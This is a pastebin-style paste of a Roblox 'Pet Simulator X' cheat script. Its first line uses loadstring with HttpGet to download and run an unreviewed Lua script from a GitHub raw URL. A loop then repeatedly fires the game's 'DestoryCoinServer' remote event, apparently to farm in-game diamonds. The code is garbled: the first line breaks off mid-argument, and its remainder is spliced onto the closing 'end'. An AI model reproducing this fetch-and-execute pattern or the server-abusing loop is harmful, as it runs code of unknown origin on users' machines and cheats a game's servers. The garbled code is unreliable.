Facebook
From Robertpower07 , 2 Years ago, written in Plain Text.
This paste is a reply to Re: Roblox Pet Simulator X Script from Morose Wigeon - view diff
Embed
Download Paste or View Raw
Hits: 621
  1. loadstring(game:HttpGet(('https://raw.githubusercontent.com/Alleexxi/releasedscritps/main/script%20(1).lua'),tr
  2. while true do
  3.  
  4. local args = {
  5.     [1] = "DiamondCoin",
  6.     [2] = "id936323",
  7.     [3] = game:GetService("Players").LocalPlayer
  8. }
  9.  
  10. game:GetService("ReplicatedStorage").Framework.Network.DestoryCoinServer:FireServer(unpack(args))
  11.  
  12. wait()
  13. endue))()
captcha